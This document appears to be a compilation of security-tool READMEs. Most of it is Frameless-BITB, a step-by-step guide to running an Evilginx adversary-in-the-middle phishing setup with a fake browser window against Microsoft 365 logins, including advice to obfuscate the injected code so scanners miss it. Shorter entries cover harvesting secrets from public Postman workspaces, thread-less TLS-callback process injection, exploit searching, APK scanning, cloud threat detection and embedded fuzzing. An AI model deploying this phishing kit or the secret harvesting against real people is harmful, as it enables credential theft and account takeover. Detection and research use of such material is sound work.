
Frameless-Bitb - A New Approach To Browser In The Browser (BITB) Without The Use Of Iframes, Allowing The Bypass Of Traditional Framebusters Implemented By Login Pages Like Microsoft And The Use With Evilginx


A new approach to Browser In The Browser (BITB) without the use of iframes, allowing the bypass of traditional framebusters implemented by login pages like Microsoft.

This POC code is built for using this new BITB with Evilginx, and a Microsoft Enterprise phishlet.


Before diving deep into this, I recommend that you first check my talk at BSides 2023, where I first introduced this concept along with important details on how to craft the "perfect" phishing attack. ▶ Watch Video

☕︎ Buy Me A Coffee


Disclaimer

This tool is for educational and research purposes only. It demonstrates a non-iframe based Browser In The Browser (BITB) method. The author is not responsible for any misuse. Use this tool only legally and ethically, in controlled environments for cybersecurity defense testing. By using this tool, you agree to do so responsibly and at your own risk.

Backstory - The Why

Over the past year, I've been experimenting with different tricks to craft the "perfect" phishing attack. The typical "red flags" people are trained to look for are things like urgency, threats, authority, and poor grammar. The next thing people nowadays check is the link/URL of the website they are interacting with, and they tend to become suspicious the moment they are asked to enter sensitive credentials like emails and passwords.

That's where Browser In The Browser (BITB) came into play. Originally introduced by @mrd0x, BITB is the concept of creating the appearance of a believable browser window inside of which the attacker controls the content (by serving the malicious website inside an iframe), while the fake URL bar of the fake browser window is set to the legitimate site the user would expect. This, combined with a tool like Evilginx, becomes the perfect recipe for a believable phishing attack.

The problem is that over the past months/years, major websites like Microsoft have implemented various little tricks called "framebusters/framekillers", which mainly attempt to break out of iframes that might be used to serve the proxied website, as in the case of Evilginx.

In short, Evilginx + BITB for websites like Microsoft no longer works. At least not with a BITB that relies on iframes.

The What

A Browser In The Browser (BITB) without any iframes! As simple as that.

Meaning that we can now use BITB with Evilginx on websites like Microsoft.

Evilginx here is just a strong example, but the same concept can be used for other use cases as well.

The How

Framebusters target iframes specifically, so the idea is to create the BITB effect without the use of iframes, and without disrupting the original structure/content of the proxied page. This can be achieved by injecting scripts and HTML alongside the original content using search and replace (aka substitutions), then relying entirely on HTML/CSS/JS tricks to create the visual effect. We also use an additional trick called "Shadow DOM" in HTML to place the content of the landing page (background) in such a way that it does not interfere with the proxied content, allowing us to flexibly use any landing page with minor additional JS scripts.
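As a minimal sketch of the substitution idea (the location, pattern, and script path below are hypothetical placeholders, not the repo's actual rules), a mod_substitute rule in the Apache config can append the BITB script right before the closing body tag of every proxied HTML response:

<Location "/">
    # Ask the upstream for uncompressed HTML so mod_substitute can rewrite it
    RequestHeader unset Accept-Encoding
    AddOutputFilterByType SUBSTITUTE text/html
    # Hypothetical rule: inject the BITB script just before </body>
    Substitute "s|</body>|<script src='/bitb/window.js'></script></body>|i"
</Location>

The real substitution files shipped in this repo follow the same principle, just with many more rules for the window chrome, URL bar, and styling.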

Instructions



Local VM:

Create a local Linux VM. (I personally use Ubuntu 22 on VMware Player or Parallels Desktop.)

Update and Upgrade system packages:

sudo apt update && sudo apt upgrade -y

Evilginx Setup:

Optional:

Create a new evilginx user, and add user to sudo group:

sudo su

adduser evilginx

usermod -aG sudo evilginx

Test that evilginx user is in sudo group:

su - evilginx

sudo ls -la /root

Navigate to the user's home dir:

cd /home/evilginx

(You can do everything as sudo user as well since we're running everything locally)

Setting Up Evilginx

Download and build Evilginx: Official Docs

Copy Evilginx files to /home/evilginx

Install Go: Official Docs

wget https://go.dev/dl/go1.21.4.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.21.4.linux-amd64.tar.gz
nano ~/.profile

ADD: export PATH=$PATH:/usr/local/go/bin

source ~/.profile

Check:

go version

Install make:

sudo apt install make

Build Evilginx:

cd /home/evilginx/evilginx2
make

Create a new directory for our evilginx build along with phishlets and redirectors:

mkdir /home/evilginx/evilginx

Copy build, phishlets, and redirectors:

cp /home/evilginx/evilginx2/build/evilginx /home/evilginx/evilginx/evilginx

cp -r /home/evilginx/evilginx2/redirectors /home/evilginx/evilginx/redirectors

cp -r /home/evilginx/evilginx2/phishlets /home/evilginx/evilginx/phishlets

Ubuntu firewall quick fix (thanks to @kgretzky)

sudo setcap CAP_NET_BIND_SERVICE=+eip /home/evilginx/evilginx/evilginx

On Ubuntu, if you get a "Failed to start nameserver on: :53" error, try modifying this file:

sudo nano /etc/systemd/resolved.conf

edit/add the DNSStubListener line and set it to no: DNSStubListener=no

then

sudo systemctl restart systemd-resolved
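To confirm the stub listener is really gone (so nothing else is holding port 53), you can check with ss from iproute2; the command should print nothing:

sudo ss -luntp | grep ':53 '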

Modify Evilginx Configurations:

Since we will be using Apache2 in front of Evilginx, we need to make Evilginx listen on a different port than 443.

nano ~/.evilginx/config.json

CHANGE https_port from 443 to 8443

Install Apache2 and Enable Mods:

Install Apache2:

sudo apt install apache2 -y

Enable the Apache2 mods that will be used (we also disable the access_compat module, as it sometimes causes issues):

sudo a2enmod proxy
sudo a2enmod proxy_http
sudo a2enmod proxy_balancer
sudo a2enmod lbmethod_byrequests
sudo a2enmod env
sudo a2enmod include
sudo a2enmod setenvif
sudo a2enmod ssl
sudo a2ensite default-ssl
sudo a2enmod cache
sudo a2enmod substitute
sudo a2enmod headers
sudo a2enmod rewrite
sudo a2dismod access_compat

Start and enable Apache:

sudo systemctl start apache2
sudo systemctl enable apache2

Verify that Apache and the VM's networking work by visiting the VM's IP from a browser on the host machine.
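Alternatively, a quick check from a terminal on the host works too (replace [VM-IP] with the IP of your VM); you should get an HTTP response with an Apache Server header:

curl -I http://[VM-IP]/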

Clone this Repo:

Install git if not already available:

sudo apt -y install git

Clone this repo:

git clone https://github.com/waelmas/frameless-bitb
cd frameless-bitb

Apache Custom Pages:

Make directories for the pages we will be serving:

  • home: (Optional) Homepage (at base domain)
  • primary: Landing page (background)
  • secondary: BITB Window (foreground)

sudo mkdir /var/www/home
sudo mkdir /var/www/primary
sudo mkdir /var/www/secondary

Copy the directories for each page:


sudo cp -r ./pages/home/ /var/www/

sudo cp -r ./pages/primary/ /var/www/

sudo cp -r ./pages/secondary/ /var/www/

Optional: Remove the default Apache page (not used):

sudo rm -r /var/www/html/

Copy the O365 phishlet to phishlets directory:

sudo cp ./O365.yaml /home/evilginx/evilginx/phishlets/O365.yaml

Optional: To set the Calendly widget to use your account instead of the default I have inside, go to pages/primary/script.js and change the CALENDLY_PAGE_NAME and CALENDLY_EVENT_TYPE.

Note on Demo Obfuscation: As I explain in the walkthrough video, I included a minimal obfuscation for text content like URLs and titles of the BITB. You can open the demo obfuscator by opening demo-obfuscator.html in your browser. In a real-world scenario, I would highly recommend that you obfuscate larger chunks of the HTML code injected or use JS tricks to avoid being detected and flagged. The advanced version I am working on will use a combination of advanced tricks to make it nearly impossible for scanners to fingerprint/detect the BITB code, so stay tuned.

Self-signed SSL certificates:

Since we are running everything locally, we need to generate self-signed SSL certificates that will be used by Apache. Evilginx will not need the certs as we will be running it in developer mode.

We will use the domain fake.com, which will point to our local VM. If you want to use a different domain, make sure to change it in all files (Apache conf files, JS files, etc.)
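If you do switch domains, a quick recursive grep helps catch every hardcoded reference before restarting Apache (the directories listed follow this repo's layout):

grep -rn 'fake.com' ./apache-configs ./custom-subs ./pages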

Create dir and parents if they do not exist:

sudo mkdir -p /etc/ssl/localcerts/fake.com/

Generate the SSL certs using the OpenSSL config file:

sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
-keyout /etc/ssl/localcerts/fake.com/privkey.pem -out /etc/ssl/localcerts/fake.com/fullchain.pem \
-config openssl-local.cnf

Modify private key permissions:

sudo chmod 600 /etc/ssl/localcerts/fake.com/privkey.pem
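You can sanity-check the generated certificate (subject, issuer, and validity window) before wiring it into Apache:

sudo openssl x509 -in /etc/ssl/localcerts/fake.com/fullchain.pem -noout -subject -issuer -dates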

Apache Custom Configs:

Copy custom substitution files (the core of our approach):

sudo cp -r ./custom-subs /etc/apache2/custom-subs

Important Note: In this repo I have included 2 substitution configs, for Chrome on Mac and Chrome on Windows BITB. Both have auto-detection and styling for light/dark mode, and they should act as base templates for achieving the same for other browser/OS combos. Since I did not include automatic detection of the browser/OS combo used to visit our phishing page, you will have to use one of the two or implement your own logic for automatic switching (see the sketch after the Include snippet below).

Both config files under /apache-configs/ are the same, differing only in which substitution file the Include directive pulls in (there are 2 references for each file).

# Uncomment the one you want and remember to restart Apache after any changes:
#Include /etc/apache2/custom-subs/win-chrome.conf
Include /etc/apache2/custom-subs/mac-chrome.conf
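If you would rather branch per request instead of keeping two separate site configs, one possible sketch uses Apache 2.4 <If>/<Else> expressions keyed on the User-Agent (the Substitute lines below are placeholders, not the repo's real rules). Note that Include is resolved at config-parse time, so the branching has to wrap the substitution directives themselves:

<Location "/">
    <If "%{HTTP_USER_AGENT} =~ /Windows NT/">
        # Windows/Chrome window-chrome substitutions would go here
        Substitute "s|<!--BITB-->|<div class='bitb-win'></div>|i"
    </If>
    <Else>
        # macOS/Chrome substitutions for everyone else
        Substitute "s|<!--BITB-->|<div class='bitb-mac'></div>|i"
    </Else>
</Location>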

To make things easier, I included both versions as separate files for the next step.

Windows/Chrome BITB:

sudo cp ./apache-configs/win-chrome-bitb.conf /etc/apache2/sites-enabled/000-default.conf

Mac/Chrome BITB:

sudo cp ./apache-configs/mac-chrome-bitb.conf /etc/apache2/sites-enabled/000-default.conf

Test Apache configs to ensure there are no errors:

sudo apache2ctl configtest

Restart Apache to apply changes:

sudo systemctl restart apache2

Modifying Hosts:

Get the IP of the VM using ifconfig and note it somewhere for the next step.

We now need to add new entries to our hosts file to point the domain used in this demo (fake.com) and all used subdomains to the VM on which Apache and Evilginx are running.

On Windows:

Open Notepad as Administrator (Search > Notepad > Right-Click > Run as Administrator)

Click File > Open (top-left), and in the File Explorer address bar, paste the following path:

C:\Windows\System32\drivers\etc\

Change the file types (bottom-right) to "All files".

Double-click the file named hosts

On Mac:

Open a terminal and run the following:

sudo nano /private/etc/hosts

Now modify the following records (replace [IP] with the IP of your VM) then paste the records at the end of the hosts file:

# Local Apache and Evilginx Setup
[IP] login.fake.com
[IP] account.fake.com
[IP] sso.fake.com
[IP] www.fake.com
[IP] portal.fake.com
[IP] fake.com
# End of section

Save and exit.

Now restart your browser before moving to the next step.

Note: On Mac, use the following command to flush the DNS cache:

sudo dscacheutil -flushcache; sudo killall -HUP mDNSResponder
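On Windows, the equivalent after editing the hosts file is:

ipconfig /flushdns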

Important Note:

This demo is made with the provided Office 365 Enterprise phishlet. To get the host entries you need to add for a different phishlet, use phishlets get-hosts [PHISHLET_NAME], but remember to replace the 127.0.0.1 with the actual local IP of your VM.

Trusting the Self-Signed SSL Certs:

Since we are using self-signed SSL certificates, our browser will warn us every time we try to visit fake.com, so we need to make our host machine trust the certificate authority that signed the SSL certs.

For this step, it's easier to follow the video instructions, but here is the gist anyway.

Open https://fake.com/ in your Chrome browser.

Ignore the Unsafe Site warning and proceed to the page.

Click the SSL icon > Details > Export Certificate. IMPORTANT: when saving, the name MUST end with .crt for Windows to open it correctly.

Double-click it > install for current user. Do NOT select automatic; instead, place the certificate in a specific store and select "Trusted Root Certification Authorities".

On Mac: to install for current user only > select "Keychain: login" AND click on "View Certificates" > details > trust > Always trust

Now RESTART your Browser

You should be able to visit https://fake.com now and see the homepage without any SSL warnings.

Running Evilginx:

At this point, everything should be ready so we can go ahead and start Evilginx, set up the phishlet, create our lure, and test it.

Optional: Install tmux to keep Evilginx running even if the terminal session is closed (mainly useful when running on a remote VM):

sudo apt install tmux -y

Start Evilginx in developer mode (using tmux to avoid losing the session):

tmux new-session -s evilginx
cd ~/evilginx/
./evilginx -developer

(To re-attach to the tmux session use tmux attach-session -t evilginx)

Evilginx Config:

config domain fake.com
config ipv4 127.0.0.1

IMPORTANT: Set Evilginx Blacklist mode to NoAdd to avoid blacklisting Apache since all requests will be coming from Apache and not the actual visitor IP.

blacklist noadd

Setup Phishlet and Lure:

phishlets hostname O365 fake.com
phishlets enable O365
lures create O365
lures get-url 0

Copy the lure URL and visit it from your browser (use Guest user on Chrome to avoid having to delete all saved/cached data between tests).

Useful Resources

Original iframe-based BITB by @mrd0x: https://github.com/mrd0x/BITB

Evilginx Mastery Course by the creator of Evilginx @kgretzky: https://academy.breakdev.org/evilginx-mastery

My talk at BSides 2023: https://www.youtube.com/watch?v=p1opa2wnRvg

How to protect Evilginx using Cloudflare and HTML Obfuscation: https://www.jackphilipbutton.com/post/how-to-protect-evilginx-using-cloudflare-and-html-obfuscation

Evilginx resources for Microsoft 365 by @BakkerJan: https://janbakker.tech/evilginx-resources-for-microsoft-365/

TODO

  • Create script(s) to automate most of the steps


Toolkit - The Essential Toolkit For Reversing, Malware Analysis, And Cracking


This tool compilation is carefully crafted to be useful to both beginners and veterans of the malware analysis world. It has also proven useful for people trying their luck in the cracking underworld.

It's the ideal complement to the manuals from the site, and to play with the numbered theories mirror.


Advantages

To be clear, this pack is intended to be the most complete and robust in existence. Some of the pros are:

  1. It contains all the basic (and not so basic) tools that you might need in a real-life scenario, be it a simple or a complex one.

  2. The pack is integrated with a Universal Updater that we made from scratch. Thanks to that, we can maintain all the tools in an automated fashion.

  3. It's really easy to expand and modify: just update the file bin\updater\tools.ini to integrate the tools you use into the updater, then add links to your tools under bin\sendto\sendto so they appear in the context menus.

  4. The installer automatically sets up everything we might need - everything from the dependencies to the environment variables - and it can even add a scheduled task to update the whole pack of tools weekly.

Installation

  1. You can simply download the stable versions from the release section, where you can also find the installer.

  2. Once downloaded, you can update the tools with the Universal Updater that we developed specifically for that purpose.
    You will find the binary at bin\updater\updater.exe.

Tool set

This toolkit is composed of 98 apps that cover everything we might need to perform reverse engineering and binary/malware analysis.
Every tool has been downloaded from its original/official website, but we still recommend using them with caution, especially those whose official pages are forum threads. Always exercise common sense.
You can check the complete list of tools here.

About contributions

Pull Requests are welcome. If you want to propose big changes, first create an Issue so we can all analyze and discuss them. The tools are compressed with 7-Zip, and the naming format is {name} - {version}.7z.



Porch-Pirate - The Most Comprehensive Postman Recon / OSINT Client And Framework That Facilitates The Automated Discovery And Exploitation Of API Endpoints And Secrets Committed To Workspaces, Collections, Requests, Users And Teams


Porch Pirate started as a tool to quickly uncover Postman secrets, and has slowly begun to evolve into a multi-purpose reconnaissance / OSINT framework for Postman. While existing tools are great proofs of concept, they only attempt to identify very specific keywords as "secrets", and in very limited locations, with no consideration for recon beyond secrets. We realized we required capabilities that were "secret-agnostic", with enough flexibility to capture false positives that still provided offensive value.

Porch Pirate enumerates and presents sensitive results (global secrets, unique headers, endpoints, query parameters, authorization, etc.) from publicly accessible Postman entities, such as:

  • Workspaces
  • Collections
  • Requests
  • Users
  • Teams

Installation

python3 -m pip install porch-pirate

Using the client

The Porch Pirate client can conduct nearly complete reviews of public Postman entities in a quick and simple fashion. There are intended workflows and particular keywords that typically maximize results; these methodologies are described on our blog: Plundering Postman with Porch Pirate.

Porch Pirate supports the following arguments, which can be run against collections, workspaces, or users.

  • --globals
  • --collections
  • --requests
  • --urls
  • --dump
  • --raw
  • --curl

Simple Search

porch-pirate -s "coca-cola.com"

Get Workspace Globals

By default, Porch Pirate will display globals from all active and inactive environments if they are defined in the workspace. Provide a -w argument with the workspace ID (found by performing a simple search, or automatic search dump) to extract the workspace's globals, along with other information.

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8

Dump Workspace

When an interesting result has been found with a simple search, we can provide the workspace ID to the -w argument with the --dump command to begin extracting information from the workspace and its collections.

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --dump

Automatic Search and Globals Extraction

Porch Pirate can be supplied a simple search term together with the --globals argument. Porch Pirate will dump all relevant workspaces tied to the results discovered in the simple search, but only if there are globals defined. This is particularly useful for quickly identifying potentially interesting workspaces to dig into further.

porch-pirate -s "shopify" --globals

Automatic Search Dump

Porch Pirate can be supplied a simple search term together with the --dump argument. Porch Pirate will dump all relevant workspaces and collections tied to the results discovered in the simple search. This is particularly useful for quickly sifting through potentially interesting results.

porch-pirate -s "coca-cola.com" --dump

Extract URLs from Workspace

A particularly useful way to use Porch Pirate is to extract all URLs from a workspace and export them to another tool for fuzzing.

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --urls

Automatic URL Extraction

Porch Pirate will recursively extract all URLs from workspaces and their collections related to a simple search term.

porch-pirate -s "coca-cola.com" --urls

Show Collections in a Workspace

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --collections

Show Workspace Requests

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --requests

Show raw JSON

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --raw

Show Entity Information

porch-pirate -w WORKSPACE_ID
porch-pirate -c COLLECTION_ID
porch-pirate -r REQUEST_ID
porch-pirate -u USERNAME/TEAMNAME

Convert Request to Curl

Porch Pirate can build curl requests when provided with a request ID for easier testing.

porch-pirate -r 11055256-b1529390-18d2-4dce-812f-ee4d33bffd38 --curl

Use a proxy

porch-pirate -s coca-cola.com --proxy 127.0.0.1:8080

Using as a library

Searching

# assumes the porchpirate client class has been imported from the porch-pirate package
p = porchpirate()
print(p.search('coca-cola.com'))

Get Workspace Collections

p = porchpirate()
print(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))

Dumping a Workspace

import json

p = porchpirate()
collections = json.loads(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))
for collection in collections['data']:
    requests = collection['requests']
    for r in requests:
        request_data = p.request(r['id'])
        print(request_data)

Grabbing a Workspace's Globals

p = porchpirate()
print(p.workspace_globals('4127fdda-08be-4f34-af0e-a8bdc06efaba'))

Other Examples

Other library usage examples can be located in the examples directory, which contains the following examples:

  • dump_workspace.py
  • format_search_results.py
  • format_workspace_collections.py
  • format_workspace_globals.py
  • get_collection.py
  • get_collections.py
  • get_profile.py
  • get_request.py
  • get_statistics.py
  • get_team.py
  • get_user.py
  • get_workspace.py
  • recursive_globals_from_search.py
  • request_to_curl.py
  • search.py
  • search_by_page.py
  • workspace_collections.py


APKDeepLens - Android Security Insights In Full Spectrum


APKDeepLens is a Python based tool designed to scan Android applications (APK files) for security vulnerabilities. It specifically targets the OWASP Top 10 mobile vulnerabilities, providing an easy and efficient way for developers, penetration testers, and security researchers to assess the security posture of Android apps.


Features

APKDeepLens is a Python-based tool that performs various operations on APK files. Its main features include:

  • APK Analysis -> Scans Android application package (APK) files for security vulnerabilities.
  • OWASP Coverage -> Covers OWASP Top 10 vulnerabilities to ensure a comprehensive security assessment.
  • Advanced Detection -> Utilizes custom Python code for APK file analysis and vulnerability detection.
  • Sensitive Information Extraction -> Identifies potential security risks by extracting sensitive information from APK files, such as insecure authentication/authorization keys and insecure request protocols.
  • In-depth Analysis -> Detects insecure data storage practices, including data related to the SD card, and highlights the use of insecure request protocols in the code.
  • Intent Filter Exploits -> Pinpoints vulnerabilities by analyzing intent filters extracted from AndroidManifest.xml.
  • Local File Vulnerability Detection -> Safeguards your app by identifying potential mishandling of local file operations.
  • Report Generation -> Generates detailed and easy-to-understand reports for each scanned APK, providing actionable insights for developers.
  • CI/CD Integration -> Designed for easy integration into CI/CD pipelines, enabling automated security testing in development workflows.
  • User-Friendly Interface -> Color-coded terminal outputs make it easy to distinguish between different types of findings.

Installation

To use APKDeepLens, you'll need to have Python 3.8 or higher installed on your system. You can then install APKDeepLens using the following command:

For Linux

git clone https://github.com/d78ui98/APKDeepLens
cd APKDeepLens
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
python APKDeepLens.py --help

For Windows

git clone https://github.com/d78ui98/APKDeepLens
cd APKDeepLens
python3 -m venv venv
.\venv\Scripts\activate
pip install -r .\requirements.txt
python APKDeepLens.py --help

Usage

To scan an APK, use the command below, specifying the APK file with the -apk argument. Once the scan is complete, a detailed report is displayed in the console.

python3 APKDeepLens.py -apk file.apk

If you've already extracted the source code and want to provide its path for a faster scan, use the command below, specifying the Android application's source code with the -source parameter.

python3 APKDeepLens.py -apk file.apk -source <source-code-path>

To generate detailed PDF and HTML reports after the scan, pass the -report argument as shown below.

python3 APKDeepLens.py -apk file.apk -report

Contributing

We welcome contributions to the APKDeepLens project. If you have a feature request, bug report, or proposal, please open a new issue here.

For those interested in contributing code, please follow the standard GitHub process. We'll review your contributions as quickly as possible :)




RemoteTLSCallbackInjection - Utilizing TLS Callbacks To Execute A Payload Without Spawning Any Threads In A Remote Process


This method utilizes TLS callbacks to execute a payload without spawning any threads in a remote process. This method is inspired by Threadless Injection as RemoteTLSCallbackInjection does not invoke any API calls to trigger the injected payload.

Quick Links

Maldev Academy Home

Maldev Academy Syllabus

Related Maldev Academy Modules

New Module 34: TLS Callbacks For Anti-Debugging

New Module 35: Threadless Injection



Implementation Steps

The PoC follows these steps:

  1. Create a suspended process using the CreateProcessViaWinAPIsW function (i.e. RuntimeBroker.exe).
  2. Fetch the remote process image base address followed by reading the process's PE headers.
  3. Fetch an address to a TLS callback function.
  4. Patch a fixed shellcode (i.e. g_FixedShellcode) with runtime-retrieved values. This shellcode is responsible for restoring both the original bytes and the memory permissions of the TLS callback function's address.
  5. Inject both shellcodes: g_FixedShellcode and the main payload.
  6. Patch the TLS callback function's address and replace it with the address of our injected payload.
  7. Resume process.

The g_FixedShellcode shellcode will then make sure that the main payload executes only once by restoring the TLS callback's original address before calling the main payload. A TLS callback can execute multiple times across the lifespan of a process, so it is important to control the number of times the payload is triggered by restoring the original code path execution to the original TLS callback function.

Demo

The following image shows our implementation, RemoteTLSCallbackInjection.exe, spawning a cmd.exe as its main payload.



Sicat - The Useful Exploit Finder

Introduction

SiCat is an advanced exploit search tool designed to identify and gather information about exploits from both open sources and local repositories effectively. With a focus on cybersecurity, SiCat allows users to quickly search online, finding potential vulnerabilities and relevant exploits for ongoing projects or systems.

SiCat's main strength lies in its ability to traverse both online and local resources to collect information about relevant exploits. This tool aids cybersecurity professionals and researchers in understanding potential security risks, providing valuable insights to enhance system security.


SiCat Resources

Installation

git clone https://github.com/justakazh/sicat.git && cd sicat

pip install -r requirements.txt

Usage


~$ python sicat.py --help

Command Line Options:

Command | Description
-h | Show help message and exit
-k KEYWORD | Keyword to search for
-kv KEYWORD_VERSION | Keyword version to search for
-nm | Identify via nmap output
--nvd | Use NVD as info source
--packetstorm | Use PacketStorm as info source
--exploitdb | Use ExploitDB as info source
--exploitalert | Use ExploitAlert as info source
--msfmodule | Use Metasploit as info source
-o OUTPUT | Path to save output to
-ot OUTPUT_TYPE | Output file type: json or html

Examples

From keyword


python sicat.py -k telerik --exploitdb --msfmodule

From nmap output


nmap --open -sV localhost -oX nmap_out.xml
python sicat.py -nm nmap_out.xml --packetstorm

To-do

  • [ ] Accept nmap results from a pipeline
  • [ ] Nmap multiple host support
  • [ ] Search NSE Script
  • [ ] Search by PORT

Contribution

I'm aware that perfection is elusive in coding. If you come across any bugs, feel free to contribute by fixing the code or suggesting new features. Your input is always welcomed and valued.



CloudGrappler - A purpose-built tool designed for effortless querying of high-fidelity and single-event detections related to well-known threat actors in popular cloud environments such as AWS and Azure


Permiso: https://permiso.io
Read our release blog: https://permiso.io/blog/cloudgrappler-a-powerful-open-source-threat-detection-tool-for-cloud-environments

CloudGrappler is a purpose-built tool designed for effortless querying of high-fidelity and single-event detections related to well-known threat actors in popular cloud environments such as AWS and Azure.


Notes

To optimize your utilization of CloudGrappler, we recommend using shorter time ranges when querying for results. This approach enhances efficiency and accelerates the retrieval of information, ensuring a more seamless experience with the tool.

Required Packages

pip3 install -r requirements.txt

Cloning cloudgrep locally

To clone the cloudgrep repository locally, run the clone.sh file. Alternatively, you can manually clone the repository into the same directory where CloudGrappler was cloned.

chmod +x clone.sh
./clone.sh

Input

This tool offers a CLI (Command Line Interface). Here is how to use it:

Example 1 - Running the tool with default queries file

Define the scanning scope inside data_sources.json file based on your cloud infrastructure configuration. The following example showcases a structured data_sources.json file for both AWS and Azure environments:

Note

Modifying the source inside the queries.json file to a wildcard character (*) will scan the corresponding query across both AWS and Azure environments.

{
  "AWS": [
    {
      "bucket": "cloudtrail-logs-00000000-ffffff",
      "prefix": [
        "testTrails/AWSLogs/00000000/CloudTrail/eu-east-1/2024/03/03",
        "testTrails/AWSLogs/00000000/CloudTrail/us-west-1/2024/03/04"
      ]
    },
    {
      "bucket": "aws-kosova-us-east-1-00000000"
    }
  ],
  "AZURE": [
    {
      "accountname": "logs",
      "container": [
        "cloudgrappler"
      ]
    }
  ]
}

Run command

python3 main.py

Example 2 - Permiso Intel Use Case

python3 main.py -p

[+] Running GetFileDownloadUrls.*secrets_ for AWS 
[+] Threat Actor: LUCR3
[+] Severity: MEDIUM
[+] Description: Review use of CloudShell. Permiso seldom witnesses use of CloudShell outside of known attackers. This however may be a part of your normal business use case.

Example 3 - Generate report

python3 main.py -p -jo

reports
└── json
    ├── AWS
    │   └── 2024-03-04 01:01 AM
    │       └── cloudtrail-logs-00000000-ffffff--
    │           └── testTrails/AWSLogs/00000000/CloudTrail/eu-east-1/2024/03/03
    │               └── GetFileDownloadUrls.*secrets_.json
    └── AZURE
        └── 2024-03-04 01:01 AM
            └── logs
                └── cloudgrappler
                    └── okta_key.json

Example 4 - Filtering logs based on date or time

python3 main.py -p -sd 2024-02-15 -ed 2024-02-16

Example 5 - Manually adding queries and data source types

python3 main.py -q "GetFileDownloadUrls.*secret", "UpdateAccessKey" -s '*'

Example 6 - Running the tool with your own queries file

python3 main.py -f new_file.json

Running in Your Cloud and Authenticating cloudgrep

AWS

Your system will need access to the S3 bucket. For example, if you are running on your laptop, you will need to configure the AWS CLI. If you are running on an EC2, an Instance Profile is likely the best choice.

If you run on an EC2 instance in the same region as the S3 bucket, with a VPC endpoint for S3, you can avoid egress charges. You can authenticate in a number of ways.
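For the laptop case, the quickest route is usually the AWS CLI's interactive setup, followed by a sanity check that your credentials resolve:

aws configure
aws sts get-caller-identity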

Azure

The simplest way to authenticate with Azure is to first run:

az login

This will open a browser window and prompt you to login to Azure.



GDBFuzz - Fuzzing Embedded Systems Using Hardware Breakpoints


This is the companion code for the paper 'Fuzzing Embedded Systems using Debugger Interfaces'. A preprint of the paper can be found here: https://publications.cispa.saarland/3950/. The code allows users to reproduce and extend the results reported in the paper. Please cite the above paper when reporting, reproducing, or extending the results.


Folder structure

.
├── benchmark # Scripts to build Google's fuzzer test suite and run experiments
├── dependencies # Contains a Makefile to install dependencies for GDBFuzz
├── evaluation # Raw experiment data, presented in the paper
├── example_firmware # Embedded example applications, used for the evaluation
├── example_programs # Contains a compiled example program and configs to test GDBFuzz
├── src # Contains the implementation of GDBFuzz
├── Dockerfile # For creating a Docker image with all GDBFuzz dependencies installed
├── LICENSE # License
├── Makefile # Makefile for creating the docker image or install GDBFuzz locally
└── README.md # This README file

Purpose of the project

The idea of GDBFuzz is to leverage hardware breakpoints from microcontrollers as feedback for coverage-guided fuzzing. To this end, GDB is used as a generic interface to enable broad applicability. For binary analysis of the firmware, Ghidra is used. The code contains a benchmark setup for evaluating the method. Additionally, example firmware files are included.

Getting Started

GDBFuzz enables coverage-guided fuzzing for embedded systems, but - for evaluation purposes - can also fuzz arbitrary user applications. For fuzzing on microcontrollers we recommend a local installation of GDBFuzz to be able to send fuzz data to the device under test flawlessly.

Install local

GDBFuzz has been tested on Ubuntu 20.04 LTS and Raspberry Pi OS (32-bit). Prerequisites are java and python3. First, create a new virtual environment and install all dependencies.

virtualenv .venv
source .venv/bin/activate
make
chmod a+x ./src/GDBFuzz/main.py

Run locally on an example program

GDBFuzz reads settings from a config file with the following keys.

[SUT]
# Path to the binary file of the SUT.
# This can, for example, be an .elf file or a .bin file.
binary_file_path = <path>

# Address of the root node of the CFG.
# Breakpoints are placed at nodes of this CFG.
# e.g. 'LLVMFuzzerTestOneInput' or 'main'
entrypoint = <entrypoint>

# Number of inputs that must be executed without a breakpoint hit until
# breakpoints are rotated.
until_rotate_breakpoints = <number>


# Maximum number of breakpoints that can be placed at any given time.
max_breakpoints = <number>

# Blacklist functions that shall be ignored.
# ignore_functions is a space separated list of function names e.g. 'malloc free'.
ignore_functions = <space separated list>

# One of {Hardware, QEMU, SUTRunsOnHost}
# Hardware: An external component starts a gdb server and GDBFuzz can connect to this gdb server.
# QEMU: GDBFuzz starts QEMU. QEMU emulates binary_file_path and starts gdbserver.
# SUTRunsOnHost: GDBFuzz starts the target program within GDB.
target_mode = <mode>

# Set this to False if you want to start ghidra, analyze the SUT,
# and start the ghidra bridge server manually.
start_ghidra = True


# Space separated list of addresses where software breakpoints (for error
# handling code) are set. Execution of those is considered a crash.
# Example: software_breakpoint_addresses = 0x123 0x432
software_breakpoint_addresses =


# Whether all triggered software breakpoints are considered as crash
consider_sw_breakpoint_as_error = False

[SUTConnection]
# The class 'SUT_connection_class' in file 'SUT_connection_path' implements
# how inputs are sent to the SUT.
# Inputs can, for example, be sent over Wi-Fi, Serial, Bluetooth, ...
# This class must inherit from ./connections/SUTConnection.py.
# See ./connections/SUTConnection.py for more information.
SUT_connection_file = FIFOConnection.py

[GDB]
path_to_gdb = gdb-multiarch
#Written in address:port
gdb_server_address = localhost:4242

[Fuzzer]
# In Bytes
maximum_input_length = 100000
# In seconds
single_run_timeout = 20
# In seconds
total_runtime = 3600

# Optional
# Path to a directory where each file contains one seed. If you don't want to
# use seeds, leave the value empty.
seeds_directory =

[BreakpointStrategy]
# Strategies to choose basic blocks are located in
# 'src/GDBFuzz/breakpoint_strategies/'
# For the paper we use the following strategies
# 'RandomBasicBlockStrategy.py' - Randomly choosing unreached basic blocks
# 'RandomBasicBlockNoDomStrategy.py' - Like previous, but doesn't use dominance relations to derive transitively reached nodes.
# 'RandomBasicBlockNoCorpusStrategy.py' - Like first, but prevents growing the input corpus and therefore behaves like blackbox fuzzing with coverage measurement.
# 'BlackboxStrategy.py', - Doesn't set any breakpoints
breakpoint_strategy_file = RandomBasicBlockStrategy.py

[Dependencies]
path_to_qemu = dependencies/qemu/build/x86_64-linux-user/qemu-x86_64
